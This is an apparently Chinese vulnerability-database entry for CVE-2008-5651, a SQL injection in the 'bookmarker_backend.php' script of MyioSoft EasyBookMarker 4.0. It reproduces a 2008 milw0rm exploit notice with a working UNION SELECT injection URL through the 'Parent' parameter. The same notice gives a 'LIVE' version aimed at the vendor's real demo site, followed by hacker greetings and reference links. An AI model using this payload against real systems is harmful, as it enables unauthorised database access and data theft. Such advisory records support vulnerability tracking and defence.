MyioSoft EasyBookMarker 'bookmarker_backend.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116666 漏洞类型 SQL注入
发布时间 2008-11-07 更新时间 2008-12-17
CVE编号 CVE-2008-5651 CNNVD-ID CNNVD-200812-343
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7053
https://www.securityfocus.com/bid/80803
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-343
|漏洞详情
MyioSoftEasyBookMarker是一款书签存储和管理软件。MyioSoftEasyBookMarker4.0版本的plugins/bookmarker/bookmarker_backend.php中存在SQL注入漏洞。远程攻击者可以借助Parent参数,执行任意SQL指令。
|漏洞EXP
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability
==============================================================================

	[»] Script:             [ Myiosoft EasyBookMarker ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://myiosoft.com/?1.4.0.0 ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 07.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[»] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--


===[ LIVE ]===

	[»] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--



	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================

# milw0rm.com [2008-11-07]
|受影响的产品
MyioSoft EasyBookMarker 4.0
|参考资料

来源:XF
名称:easybookmarker-parent-sql-injection(46474)
链接:http://xforce.iss.net/xforce/xfdb/46474
来源:BID
名称:32200
链接:http://www.securityfocus.com/bid/32200
来源:VUPEN
名称:ADV-2008-3075
链接:http://www.frsirt.com/english/advisories/2008/3075
来源:SECUNIA
名称:32636
链接:http://secunia.com/advisories/32636
来源:OSVDB
名称:49690
链接:http://osvdb.org/49690
来源:MILW0RM
名称:7053
链接:http://milw0rm.com/exploits/7053